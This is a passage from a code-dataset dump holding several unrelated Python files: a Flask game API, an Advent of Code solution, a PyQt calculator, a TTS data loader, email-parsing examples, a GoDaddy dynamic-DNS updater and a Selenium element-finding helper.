user_info.create_user_info(userid, team)\n return Response(JSONEncoder().encode(response), status=200, mimetype='application/json')\n else:\n return Response(\"get me some more shiz\", status=401)\n\n if request.method == \"GET\":\n userid = request.headers[\"userid\"]\n if userid:\n info = user_info.get_user_info(userid)\n if info:\n return Response(JSONEncoder().encode(info), status=200, mimetype='application/json')\n else:\n return Response(\"User doesn't exist\", status=401)\n else:\n return Response(\"No user id provided\", status=400)\n\n\n#Updates given user's info\n@app.route('/api/user/update', methods=[\"POST\"])\ndef updateUser():\n error = ''\n try:\n userid = request.headers[\"userid\"]\n content = request.json\n print(userid)\n print(content)\n if userid and content:\n print(\"Updating user info\")\n response = user_info.update_user_info(userid, content)\n return Response(JSONEncoder().encode(response), status=200, mimetype='application/json')\n\n except Exception as e:\n return \"Error! Unable to perform /api/user/update request\"\n\n#Update given user's virion(balance)\n@app.route('/api/user/update/virion', methods=[\"POST\"])\ndef updateVirion():\n error = ''\n try:\n userid = request.headers[\"userid\"]\n content = request.json\n virion = content[\"balance\"]\n if userid and content:\n print(\"Updating user virion balance ...\")\n response = user_info.update_user_virion(userid, virion)\n return Response(JSONEncoder().encode(response), status=200, mimetype='application/json')\n\n except Exception as e:\n return \"Error! Unable to perform /api/user/update/virion request\"\n\n\n#Updates given user's info\n@app.route('/api/store', methods=[\"GET\"])\ndef getCatalogue():\n error = ''\n try:\n response = store_engine.get_store_catalogue()\n return Response(JSONEncoder().encode(response), status=200, mimetype='application/json')\n\n except Exception as e:\n return \"Error! Unable to perform /api/store request\"\n\n\n# Simulates users spending resource\n@app.route('/api/simulate', methods=[\"POST\"])\ndef simulate():\n\n loops = int(request.args.get(\"loops\"))\n landmark_manager.simulate(loops)\n\n return Response(status=200)\n\n\n@app.route('/api/admin/delete_users', methods=[\"POST\"])\ndef delete_users():\n\n admin.del_users()\n return Response(status=200)\n\nif __name__ == '__main__':\n app.run('0.0.0.0', 5000, use_reloader=False)\n","repo_name":"Development-Illustrated/blight-backend","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"24261183113","text":"import numpy as np\nimport pandas as pd\n\nrowheaders = [\n ('A', 't1'),\n ('A', 't2'),\n ('A', 't2'),\n ('B', 't2'),\n ('B', 't3'),\n ('C', 't1'),\n ('Z', 't2'),\n ('Z', 't4'),\n ('D', 't2'),\n ('D', 't3'),\n]\n\npd.MultiIndex.from_tuples( rowheaders )\n\ndf = pd.DataFrame( np.random.rand(len(rowheaders), 3), columns=['a', 'b', 'c'], index=pd.MultiIndex.from_tuples( rowheaders ))\n\ndf.index.set_names(['cust', 'tier'], inplace=True)\n\nidxdf = pd.DataFrame( df.index.values.tolist(), columns=df.index.names )\n\ninc = (idxdf != idxdf.shift()).cumsum(axis=1) > 0\n\n# x = inc['cust']\n\ndef find_span( x ):\n idx = x.index[x].to_series()\n x = x * (idx.shift(-1).fillna(len(x)) - idx)\n return x.fillna(0.).astype(np.int64)\n\nparam = inc.apply(find_span)\n\nclass H(object):\n def __init__(self, rowspan=1):\n self.rowspan = rowspan\n def __repr__(self):\n return '<H>: rowspan=%s'%self.rowspan\n\nmap( lambda r: map( lambda x: H(x) if x > 0 else None, r), param.values )\n\n\ndf.join( df['a'].sum(level='cust',).rename('abc'), ).sort_values(['abc', 'a'])\n","repo_name":"gasquit/jinpingmei","sub_path":"convert_df_header.py","file_name":"convert_df_header.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20807629215","text":"from itertools import islice\n\ndef main():\n f = open('23-input.txt', 'r')\n lines = f.read().split('\\n')[:-1]\n f.close()\n\n cups = []\n for char in lines[0]:\n cups.append(int(char))\n\n curr = cups[0]\n for i in range(0, 100):\n go = move(cups, curr)\n cups = go[0]\n curr = go[1]\n\n result = ''\n for cup in cups:\n result += str(cup)\n\n final = ''\n last = result.split('1')\n for thing in last[::-1]:\n final += thing\n\n print('Result:', final)\n\ndef move(cups, curr):\n dest = curr - 1\n if dest == 0: dest = 9\n\n pickup = []\n i = cups.index(curr) + 1\n for j in range(0, 3):\n if i == len(cups): i = 0\n pickup.append(cups[i])\n i += 1\n\n for element in pickup:\n cups.remove(element)\n\n while dest not in cups:\n dest -= 1\n if dest == 0: dest = 9\n\n ind = cups.index(dest)\n for element in pickup[::-1]:\n cups.insert(ind+1, element)\n\n prev_index = cups.index(curr)\n if prev_index == len(cups) - 1:\n next_curr = cups[0]\n else:\n next_curr = cups[prev_index + 1]\n\n return cups, next_curr\n\nif __name__ == '__main__':\n main()\n\n# Result: \n","repo_name":"Clue88/AoC2020","sub_path":"Day 23/23-1.py","file_name":"23-1.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3877239964","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nRapid Gui Programming with Python and Qt - The Definitive Guide to PyQt Programming\nChapter 4 - Exercise\nThe Interest Program\nCreated: Thur 26 Sep 2013\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom future_builtins import *\n\nimport sys\nfrom PyQt4.QtCore import (Qt, SIGNAL)\nfrom PyQt4.QtGui import (QApplication, QComboBox, QDialog, QDoubleSpinBox, QGridLayout, QLabel)\n\nclass Form(QDialog):\n\t\n\tdef __init__(self, parent = None):\n\t\tsuper(Form, self).__init__(parent)\n\n\t\t#Set principal spinbox\n\t\tprincipalLabel = QLabel(\"Principal:\")\n\t\tself.principalSpinBox = QDoubleSpinBox()\n\t\tself.principalSpinBox.setRange(1, 1000000000)\n\t\tself.principalSpinBox.setValue(1000)\n\t\tself.principalSpinBox.setPrefix(\"$ \")\n\t\t\n\t\t#Set rate spinbox\n\t\trateLabel = QLabel(\"Rate:\")\n\t\tself.rateSpinBox = QDoubleSpinBox()\n\t\tself.rateSpinBox.setRange(1, 100)\n\t\tself.rateSpinBox.setValue(5)\n\t\tself.rateSpinBox.setSuffix(\" %\")\n\n\t\t#Set years label\n\t\tyearsLabel = QLabel(\"Years:\")\n\t\tself.yearsComboBox = QComboBox()\n\t\tself.yearsComboBox.addItem(\"1 year\")\n\t\tself.yearsComboBox.addItems([\"{0} years\".format(x) for x in range(2, 26)])\n\n\t\t#Set amount label\n\t\tamountLabel = QLabel(\"Amount\")\n\t\tself.amountLabel = QLabel()\n\n\t\t#Set grid layout for principal label and spinbox\n\t\tgrid = QGridLayout()\n\t\tgrid.addWidget(principalLabel, 0, 0)\n\t\tgrid.addWidget(self.principalSpinBox, 0, 1)\n\t\t\n\t\t#Set grid layout for rate label and spinbox\n\t\tgrid.addWidget(rateLabel, 1, 0)\n\t\tgrid.addWidget(self.rateSpinBox, 1, 1)\n\n\t\t#Set grid layout for years label and combobox\n\t\tgrid.addWidget(yearsLabel, 2, 0)\n\t\tgrid.addWidget(self.yearsComboBox, 2, 1)\n\n\t\t#Set grid layout for amount label\n\t\tgrid.addWidget(amountLabel, 3, 0)\n\t\tgrid.addWidget(self.amountLabel, 3, 1)\n\n\t\t#Set final grid layout\n\t\tself.setLayout(grid)\n\n\t\t#Set signals and slots\n\t\tself.connect(self.principalSpinBox, SIGNAL(\"valueChanged(double)\"), self.updateUi)\n\t\tself.connect(self.rateSpinBox, SIGNAL(\"valueChanged(double)\"), self.updateUi)\n\t\tself.connect(self.yearsComboBox, SIGNAL(\"currentIndexChanged(int)\"), self.updateUi)\n\n\t\t#Set Window title\n\t\tself.setWindowTitle(\"Interest\")\n\n\t\t#Update UI\n\t\tself.updateUi\n\n\tdef updateUi(self):\n\t\t\"\"\"Calculates compound interest\"\"\"\n\t\tprincipal = self.principalSpinBox.value()\n\t\trate = self.rateSpinBox.value()\n\t\tyears = self.yearsComboBox.currentIndex() + 1\n\t\tamount = principal * ((1 + (rate/100.0)) ** years)\n\t\tself.amountLabel.setText(\"$ {0:.2f}\".format(amount))\n\n#Create App\napp = QApplication(sys.argv)\nform = Form()\nform.show()\napp.exec_()\n","repo_name":"vamtiger-project/python-desktop-gui-practice","sub_path":"03-interest-calculator.pyw","file_name":"03-interest-calculator.pyw","file_ext":"pyw","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23497370888","text":"import pandas as pd\nimport numpy as np\n\nimport hyperparams as hp\nimport util.audio as audio\nimport util.text_util as text_util\nimport tensorflow as tf\n\n\nclass DataReader():\n def __init__(self, data_path=hp.data_path):\n self.wavs_path = data_path\n self.labels_path = data_path + hp.transcript_path\n\n self._df = pd.read_csv(self.labels_path, sep='|', header=None, names=['wav_path','text', 'text_norm','duration']) \n self._normalize_text()\n self.df = self._df[self._df['duration'] < hp.max_duration].copy()\n self.df.drop(['text_norm'], axis=1, inplace=True)\n\n def _normalize_text(self):\n self._df['text'] = self._df['text'].apply(text_util.text_normalize)\n \n @property\n def max_duration(self):\n return self.df['duration'].max()\n\n @property\n def max_characters(self):\n return len(self.df['text'].max())\n\n @property\n def total_audio_len(self):\n return self.df['duration'].sum()\n\n\n def _process_sample(self, row, load=False):\n \n if load:\n pass\n else:\n wav = audio.load_wav(self.wavs_path + row['wav_path'])\n\n # Compute the linear-scale spectrogram from the wav:\n spectrogram = audio.spectrogram(wav).astype(np.float32).T\n # n_frames = spectrogram.shape[1]\n\n # Compute a mel-scale spectrogram from the wav:\n mel_spectrogram = audio.melspectrogram(wav).astype(np.float32).T\n\n dones = np.zeros(mel_spectrogram.shape[0])\n dones[-1] = 1\n\n char2idx, _ = text_util.get_vocab()\n text = [char2idx[char] for char in row['text']]\n\n frames_count = mel_spectrogram.shape[0]\n # Padding\n text = tf.pad(text, ((0, hp.max_timesteps),))[:hp.max_timesteps] # (max_timesteps,)\n mel_spectrogram = tf.pad(mel_spectrogram, ((0, hp.max_frames), (0, 0)))[:hp.max_frames] # (max_frames, n_mels)\n dones = tf.pad(dones, ((0, hp.max_frames),))[:hp.max_frames] # (max_frames,)\n spectrogram = tf.pad(spectrogram, ((0, hp.max_frames), (0, 0)))[:hp.max_frames] # (max_frames, 1+n_fft/2)\n\n return text, spectrogram, mel_spectrogram, dones, frames_count\n\n def get_data(self,n=hp.batch_size):\n batch_x,batch_mag,batch_mel,batch_dones,batch_frames = [], [], [], [], []\n for _, row in self.df.iterrows():\n \n text, mag, mel, dones,size = self._process_sample(row)\n\n batch_x.append(text)\n batch_mag.append(mag)\n batch_mel.append(mel)\n batch_dones.append(dones)\n batch_frames.append(size)\n\n if len(batch_x) == n:\n \n yield tf.convert_to_tensor(batch_x), \\\n tf.convert_to_tensor(batch_mag), \\\n tf.convert_to_tensor(batch_mel), \\\n tf.convert_to_tensor(batch_dones), \\\n tf.convert_to_tensor(batch_frames)\n\n batch_x,batch_mag,batch_mel,batch_dones = [], [], [], []\n\n def _list_to_ragged(self, values):\n lengths = [len(v) for v in values]\n flatten = np.concatenate(values, axis=0)\n return tf.RaggedTensor.from_row_lengths(values=flatten,row_lengths=lengths)\n\n# next(DataReader().get_data())","repo_name":"Misterion777/tts_system","sub_path":"src/util/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"38523821266","text":"from flanker.addresslib import address\n\nap = address.parse('Example example@example.com')\nprint(ap)\n\nnot_email = address.parse('Example @example.com')\nprint(not_email)\n\nmulti_address = address.parse_list('example1@example.com, example2@example.com')\nprint(multi_address)\n\nmulti_address2 = address.parse_list('example1@example.com, example2@example.com', as_tuple=True)\nprint(multi_address2)\n\nmulti_address3 = address.parse_list('example1@example.com, example2@example.com', strict=True)\nprint(multi_address3)\n\nfrom flanker.addresslib import validate\n\nsa = validate.suggest_alternate('example@gmail..com')\nprint(sa)\n\n\nmsg = '''MIME-Version: 1.0\nContent-Type: text/plain\nFrom: Example1 <example1@example.com>\nTo: Example2 <example2@example.com>\nSubject: hello, message\nDate: Mon, 10 Sep 2019 12:43:03 -0700\n\nthis is a single part message.'''\n\nfrom flanker import mime\n\nfs = mime.from_string(msg)\nprint(fs.body)\nprint(fs.headers.items())\n\nprint(fs.content_type)\nprint(fs.subject)\n\nprint(fs.content_type.is_singlepart())\nprint(fs.content_type.is_multipart())\n\n\nfrom flanker.mime import create\n\nmessage = create.text(\"plain\", \"hello, world!\")\nmessage.headers['From'] = u'Example1 <example1@example.com>'\nmessage.headers['To'] = u'Example2 <example2@example.com>'\nmessage.headers['Subject'] = u\"hello\"\nmessage = create.from_string(message.to_string())\nprint(message.to_string())","repo_name":"minwook-shin/learning-code","sub_path":"python/flanker-test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"3181832017","text":" #//parameters\n #int S=...; //number of servers\n #int N=...; //numbe of nodes\n #int F=...; //number of file VNF\n #int L=...; //number of edges/links\n \n #range servers=1..S; // virtual serveers\n #range nodes=1..N; // clients\n #range files=1..F; // videos/vCDNs/services\n #range jo=1..L; // index for representing links\n #range io=1..L; // links's index\n\n#\"\"\"\n\n#Params initalization\n#POPs are the Servers\nS = 0\nobj_S = []\nDbId_S = []\ndebit_max = []\nvolume = []\nfor pop in listPOPs:\n\tobj_S.append(pop)\n\tDbId_S.append(pop.id)\n\tdebit_max.append(pop.totalNetBW)\n\tvolume.append(pop.totalDisk)\n\tS = S+1\n\nF = 0\nobj_F = []\nDbId_F = []\nsize_of = []\nfor v in listVCDNs:\n\tobj_F.append(v)\n\tDbId_F.append(v.id)\n\tsize_of.append(v.vDisk)\n\tF = F+1\n\nN = 0\nobj_N = []\nDbId_N = []\nfor c in listClientGroups:\n\tobj_N.append(c)\n\tDbId_N.append(c.id)\n\tN = N+1\n\nL = 0\nobj_L = []\nDbId_L = []\nC = []\nfor l in listNetworkLinks:\n\tobj_L.append(l)\n\tDbId_L.append(l.id)\n\tC.append(l.capacity)\n\tL = L+1\n\n\n\"\"\"\n\tint d[nodes][files]; // debit du film \"files\" dans node \"nodes\"\"\n\tint C[io]; // link capacity of any edge \n\tint debit_max[servers];\n\tint z[nodes][files][io]; ///network flow parameters\n\tint volume[servers];\t//maximum storage size of each server\n\tint size_of[files];\t// vCDN parameters (size)\n\tfloat c[servers][servers][files];\t\t//cost\n \n\"\"\"\nd = [ [0 for x in range(N) ] for y in range(N)]\nfor dem in listDemands:\n\td [ DbId_N.index(dem.ClientGroupId) ][ DbId_F.index(dem.vCDNId) ] = dem.qowBW\n\nc = [ [ [0 for x in range(S) ] for y in range(S)] for z in range(F)]\nfor cost in CostPopXPopXvCDN:\n\tc [ DbId_L.index(cost.locationAId) ][ DbId_L.index(cost.locationBId) ] = cost.cost\n\nz = [ [ [0 for x in range(N) ] for y in range(F)] for z in range(L)]\n","repo_name":"TelecomSudparis-RST/vIOS","sub_path":"bin/vIOSLib/OMAC_Problem.py","file_name":"OMAC_Problem.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35745422402","text":"# easy method\r\n\r\ndef rotateLeft(d, arr):\r\n # reverse helper function\r\n return (arr[d:] + arr[0:d])\r\n\r\n\r\n# n space n time\r\ndef rotateLeft(d, arr):\r\n n = len(arr)\r\n newarr = [None] * n\r\n\r\n for i in range(n):\r\n newidx = (i + n - d) % n\r\n newarr[newidx] = arr[i]\r\n\r\n return newarr\r\n\r\n\r\n# d space n time\r\n# function to rotate array by d elements using temp array\r\ndef rotateArray(arr, n, d):\r\n temp = []\r\n i = 0\r\n while (i < d):\r\n temp.append(arr[i])\r\n i = i + 1\r\n i = 0\r\n while (d < n):\r\n arr[i] = arr[d]\r\n i = i + 1\r\n d = d + 1\r\n arr[:] = arr[: i] + temp\r\n return arr\r\n\r\n# O(1) space , O(n*d) time\r\n\r\n# Function to left rotate arr[] of size n by d*/\r\ndef leftRotate(arr, d, n):\r\n for i in range(d):\r\n leftRotatebyOne(arr, n)\r\n\r\n\r\n# Function to left Rotate arr[] of size n by 1*/\r\ndef leftRotatebyOne(arr, n):\r\n temp = arr[0]\r\n for i in range(n - 1):\r\n arr[i] = arr[i + 1]\r\n arr[n - 1] = temp\r\n\r\n# O(1) space, O(n) time ( gcd method )\r\ndef leftRotate(arr, d, n):\r\n for i in range(gcd(d, n)):\r\n\r\n # move i-th values of blocks\r\n temp = arr[i]\r\n j = i\r\n while 1:\r\n k = j + d\r\n if k >= n:\r\n k = k - n\r\n if k == i:\r\n break\r\n arr[j] = arr[k]\r\n j = k\r\n arr[j] = temp\r\n\r\ndef gcd(a, b):\r\n if b == 0:\r\n return a;\r\n else:\r\n return gcd(b, a%b)\r\n","repo_name":"jyotijauhari/DSA-questions-Python","sub_path":"HackerRank/LeftRotate.py","file_name":"LeftRotate.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10466798384","text":"#!/usr/bin/python3\nfrom godaddypy import Client, Account\nimport os\nfrom os import path\nfrom os import getenv\nimport requests\nimport time\nimport datetime\nimport sys\n\n#Enable Logging\nnow = str(datetime.datetime.now()) + ' | '\n\n#Confirm variables are set\ntry:\n subdomains = os.environ.get('SUBDOMAINS').split(';')\n domain = os.environ.get('DOMAIN')\n apiKey = os.environ.get('GODADDY_KEY')\n secret = os.environ.get('GODADDY_SECRET')\nexcept:\n print(now+'One or more environment variables not set, exiting program.')\n sys.exit()\n\n#Get current public IP\ncurrentPublicIP = requests.get(\"https://api.ipify.org\").text\n\n#Check if cache file exists\nif path.exists(\"/cache.txt\"):\n print(now + 'Cached IP file exists, comparing current public IP')\n cacheFile = open('/cache.txt','r')\n cachedIP = cacheFile.read()\n if cachedIP == currentPublicIP:\n print(now+'Update not needed.')\n else:\n #Use GoDaddyPy to interact with GoDaddy API\n print(now+'Public IP has changed, updating now!')\n my_acct = Account(api_key=apiKey, api_secret=secret)\n client = Client(my_acct)\n for singledomain in subdomains:\n #Update all subdomains if current public IP not the same as cached\n time.sleep(1)\n client.update_record_ip(currentPublicIP, domain, singledomain, 'A')\n print(now+'Records updated!')\n cacheFile.close()\n\nelse:\n #First run, create cache.txt\n print(now+'Cached IP file does not exist, creating and storing current public IP')\n newCacheFile = open('/cache.txt', 'w')\n newCacheFile.write(currentPublicIP)\n newCacheFile.close()\n\n my_acct = Account(api_key=apiKey, api_secret=secret)\n client = Client(my_acct)\n for singledomain in subdomains:\n time.sleep(1)\n client.update_record_ip(currentPublicIP, domain, singledomain, 'A')\n","repo_name":"mjmammoth/godaddy-dyndns","sub_path":"godaddy-dyndns.py","file_name":"godaddy-dyndns.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5965963094","text":"# https://www.acmicpc.net/problem/10825\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\ninfo = []\r\n\r\nfor _ in range(n):\r\n name, kor, eng, math = input().split()\r\n info.append([name, int(kor), int(eng), int(math)])\r\n\r\ninfo.sort(key=lambda x: (-x[1], x[2], -x[3], x[0]))\r\n\r\nfor i in info:\r\n print(i[0])","repo_name":"kylew1004/algorithm","sub_path":"Baekjoon/정렬/10825.py","file_name":"10825.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39974046082","text":"# -*- coding: utf-8 -*-\n# -*- coding: cp1252 -*-\n\"\"\"\nCreated on Jun 21, 2017\n@author: Built_In_Automation Solutionz Inc.\n\"\"\"\nimport sys, time, re\nimport inspect\nimport traceback\nfrom pathlib import Path\nfrom Framework.Utilities import CommonUtil\nfrom Framework.Utilities.CommonUtil import passed_tag_list, failed_tag_list\nfrom Framework.Built_In_Automation.Shared_Resources import (\n BuiltInFunctionSharedResources as sr,\n)\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport selenium\nfrom xml.etree.ElementTree import tostring, fromstring\nglobal WebDriver_Wait\nWebDriver_Wait = 2\nglobal generic_driver\ngeneric_driver = None\n# driver type will be set globally so we can use it anytime\nglobal driver_type\ndriver_type = None\n\n\nMODULE_NAME = inspect.getmodulename(__file__)\n\n\ndef Get_Element(step_data_set, driver, query_debug=False, return_all_elements=False, element_wait=None):\n \"\"\"\n This funciton will return \"zeuz_failed\" if something went wrong, else it will always return a single element\n if you are trying to produce a query from a step dataset, make sure you provide query_debug =True. This is\n good when you are just trying to see how your step data would be converted to a query for testing local runs\n \"\"\"\n try:\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n global generic_driver\n generic_driver = driver\n # Check the driver that is given and set the driver type\n global driver_type\n driver_type = _driver_type(query_debug)\n\n # Checking whether the given element is web element or web driver\n if isinstance(driver, selenium.webdriver.remote.webelement.WebElement):\n web_element_object = True\n else:\n web_element_object = False\n\n if element_wait is not None:\n element_wait = float(element_wait)\n\n if driver_type == None:\n CommonUtil.ExecLog(\n sModuleInfo, \"Incorrect driver. Please validate driver\", 3\n )\n return \"zeuz_failed\"\n\n # We need to switch to default content just in case previous action switched to something else\n try:\n if driver_type == \"selenium\":\n pass #generic_driver.switch_to.default_content()\n # we need to see if there are more than one handles. Since we cannot know if we had switch\n # windows before, we are going to assume that we can always safely switch to default handle 0\n \"\"\"\n try:\n all_windows = generic_driver.window_handles\n generic_driver.switch_to.window(all_windows[0])\n True\n except:\n True\n \"\"\"\n elif driver_type == \"appium\":\n\n # If we find a '|' character in the left column, then try to check the platform\n # and filter the appropriate data for the left column by removing '|'\n device_platform = (\n generic_driver.capabilities[\"platformName\"].strip().lower()\n )\n cleaned_data_set = []\n str_to_strip = \"|*|\"\n for left, middle, right in step_data_set:\n if \"element parameter\" in middle:\n # Split the attribute field if str_to_strip is present\n if left.find(str_to_strip) != -1:\n if device_platform == \"android\":\n left = left.split(str_to_strip)[0].strip()\n elif device_platform == \"ios\":\n left = left.split(str_to_strip)[1].strip()\n\n # Split the value field if str_to_strip is present\n if right.find(str_to_strip) != -1:\n if device_platform == \"android\":\n right = right.split(str_to_strip)[0].strip()\n elif device_platform == \"ios\":\n right = right.split(str_to_strip)[1].strip()\n\n new_row = (\n left,\n middle,\n right,\n )\n cleaned_data_set.append(new_row)\n\n step_data_set = cleaned_data_set\n\n new_step_data = []\n for row in step_data_set:\n if row[0] == \"resource-id\" and str(row[2]).startswith(\"*\"):\n new_value = row[2]\n new_value = (\n sr.Get_Shared_Variables(\"package_name\")\n + \":id/\"\n + new_value[1:]\n )\n new_row = [row[0], row[1], new_value]\n new_step_data.append(new_row)\n else:\n new_step_data.append(row)\n step_data_set = new_step_data\n except Exception as e:\n pass # Exceptions happen when we have an alert, but is not a problem\n\n save_parameter = \"\"\n get_parameter = \"\"\n Filter = \"\"\n text_filter_cond = False\n for row in step_data_set:\n if row[1] == \"save parameter\":\n if row[2] != \"ignore\":\n save_parameter = row[0]\n elif row[1].strip().lower() == \"get parameter\":\n if row[2].strip().startswith(\"%|\") and row[2].strip().endswith(\"|%\"):\n get_parameter = row[2].strip().strip(\"%\").strip(\"|\")\n else:\n CommonUtil.ExecLog(sModuleInfo, \"Use '%| |%' sign at right column to get variable value\", 3)\n return \"zeuz_failed\"\n elif row[1].strip().lower() == \"optional parameter\":\n left = row[0].strip().lower()\n right = row[2].strip().lower()\n if left in (\"allow hidden\", \"allow disable\"):\n Filter = left if right in (\"yes\", \"true\", \"ok\") else Filter\n elif left == \"wait\":\n element_wait = float(right)\n elif left == \"text filter\":\n text_filter_cond = right in (\"yes\", \"true\", \"ok\", \"enable\")\n\n\n if get_parameter != \"\":\n\n result = sr.parse_variable(get_parameter)\n result = CommonUtil.ZeuZ_map_code_decoder(result) # Decode if this is a ZeuZ_map_code\n if result not in failed_tag_list:\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Returning saved element '%s' from shared variables\"\n % get_parameter,\n 1,\n )\n return result\n else:\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Element named '%s' not found in shared variables\" % get_parameter,\n 3,\n )\n return \"zeuz_failed\"\n\n if driver_type == \"pyautogui\":\n result = _pyautogui(step_data_set)\n if save_parameter != \"\": # save element to a variable\n sr.Set_Shared_Variables(save_parameter, result)\n return result\n\n # here we switch driver if we need to\n _switch(step_data_set)\n index_number = _locate_index_number(step_data_set)\n element_query, query_type = _construct_query(step_data_set, web_element_object)\n CommonUtil.ExecLog(sModuleInfo, f\"To locate the Element we used {query_type}:\\n{element_query}\", 5)\n\n if query_type in (\"xpath\", \"css\", \"unique\"):\n result = _get_xpath_or_css_element(element_query, query_type, step_data_set, index_number, Filter, return_all_elements, element_wait)\n if result == \"zeuz_failed\" and text_filter_cond:\n result = text_filter(step_data_set, Filter, element_wait, return_all_elements)\n else:\n result = \"zeuz_failed\"\n\n \"\"\" The following code should have handled element_click_interception_exception according to doc but it cannot handle yet kept the code for rnd \"\"\"\n # try:\n # if isinstance(result, selenium.webdriver.remote.webelement.WebElement):\n # if not EC.element_to_be_clickable(result):\n # CommonUtil.ExecLog(sModuleInfo, \"Waiting for the element to be clickable for at most %s seconds\" % wait_clickable, 2)\n # WebDriverWait(driver, wait_clickable).until(EC.element_to_be_clickable((By.XPATH, element_query)))\n # except:\n # CommonUtil.Exception_Handler(sys.exc_info())\n\n if result not in failed_tag_list:\n if type(result) != list:\n try:\n attribute_parameter = result.get_attribute('outerHTML')\n i, c = 0, 0\n for i in range(len(attribute_parameter)):\n if attribute_parameter[i] == '\"':\n c += 1 \n if (attribute_parameter[i] == \">\" and c % 2 == 0):\n break\n attribute_parameter = attribute_parameter[:i+1]\n CommonUtil.ExecLog(sModuleInfo, \"%s\" % (attribute_parameter), 5)\n except:\n pass\n if save_parameter != \"\": # save element to a variable\n sr.Set_Shared_Variables(save_parameter, result)\n sr.Set_Shared_Variables(\"zeuz_element\", result)\n return result # Return on pass\n elif result == \"zeuz_failed\":\n try:\n if len(generic_driver.find_elements(By.TAG_NAME, \"iframe\")) > 0:\n CommonUtil.ExecLog(sModuleInfo, \"You have Iframes in your Webpage. Try switching Iframe with \\\"Switch Iframe\\\" action\", 3)\n elif len(generic_driver.find_elements(By.TAG_NAME, \"frame\")) > 0:\n CommonUtil.ExecLog(sModuleInfo, \"You have Frames in your Webpage. Try switching Frame with \\\"Switch Iframe\\\" action\", 3)\n except:\n pass\n return \"zeuz_failed\"\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef text_filter(step_data_set, Filter, element_wait, return_all_elements):\n \"\"\"\n suppose dom has <div>Hello  World</div>\n the text will be converted to \"<something unknown>Hello world<something unknown>\"\n Thats why (text, element parameter, Hello world) does not work\n But (*text, element parameter, Hello world) works!\n So for now we don't need this python script for now as we have an existing solution\n \"\"\"\n try:\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n mid_vals = [\n \"sibling parameter\",\n ]\n patterns = [\n \"^sibling \\d parameter$\",\n ]\n temp_dataset = []\n filters = []\n for left, mid, right in step_data_set:\n l = left.strip().lower().replace(\"*\", \"\")\n m = mid.strip().lower()\n if m in mid_vals:\n return \"zeuz_failed\"\n for pattern in patterns:\n if re.search(pattern, m):\n return \"zeuz_failed\"\n if l == \"text\" and m == \"element parameter\":\n filters.append((left, mid, right))\n else:\n temp_dataset.append((left, mid, right))\n\n if not filters:\n return \"zeuz_failed\"\n\n index_number = _locate_index_number(temp_dataset)\n index_number = index_number if index_number is not None else 0\n element_query, query_type = _construct_query(temp_dataset)\n CommonUtil.ExecLog(sModuleInfo, f\"No Element found. Now we are trying to handle   and <space>\", 1)\n CommonUtil.ExecLog(sModuleInfo, f\"To locate the Element we used {query_type}:\\n{element_query}\", 5)\n\n if query_type in (\"xpath\", \"css\", \"unique\"):\n result = _get_xpath_or_css_element(element_query, query_type, temp_dataset, None, Filter, True, element_wait)\n else:\n return \"zeuz_failed\"\n\n tmp_results = []\n similar_texts = []\n for element in result:\n for f in filters:\n if element.text not in similar_texts and f[2].lower().replace(\"\\xa0\", \"\").replace(\" \", \"\") in re.sub('\\s+', '', element.text.lower().replace(\"\\xa0\", \"\")):\n similar_texts.append(element.text)\n if f[0].startswith(\"**\") and f[2].lower().replace(\"\\xa0\", \" \") in element.text.lower().replace(\"\\xa0\", \" \"):\n break\n elif f[0].startswith(\"*\") and f[2].replace(\"\\xa0\", \" \") in element.text.replace(\"\\xa0\", \" \"):\n break\n elif f[2].replace(\"\\xa0\", \" \") == element.text.replace(\"\\xa0\", \" \"):\n break\n else:\n continue\n tmp_results.append(element)\n\n if return_all_elements:\n CommonUtil.ExecLog(sModuleInfo, f\"Returning {len(tmp_results)} elements after applying Text Filter\", 1)\n return result\n if len(tmp_results) == 0:\n CommonUtil.ExecLog(sModuleInfo, \"Found no element after applying Text Filter\", 3)\n if len(similar_texts) > 0:\n CommonUtil.ExecLog(sModuleInfo, f\"These are the similar texts found in the HTML: {str(similar_texts)[1:-1]}\", 3)\n return \"zeuz_failed\"\n CommonUtil.ExecLog(sModuleInfo, f\"Original text of the element is '{tmp_results[index_number].text}'\", 1)\n if len(tmp_results) == index_number + 1 == 1:\n return tmp_results[index_number]\n else:\n CommonUtil.ExecLog(sModuleInfo, f\"Found {len(tmp_results)} elements after applying Text Filter. Returning the element of index {index_number}\", 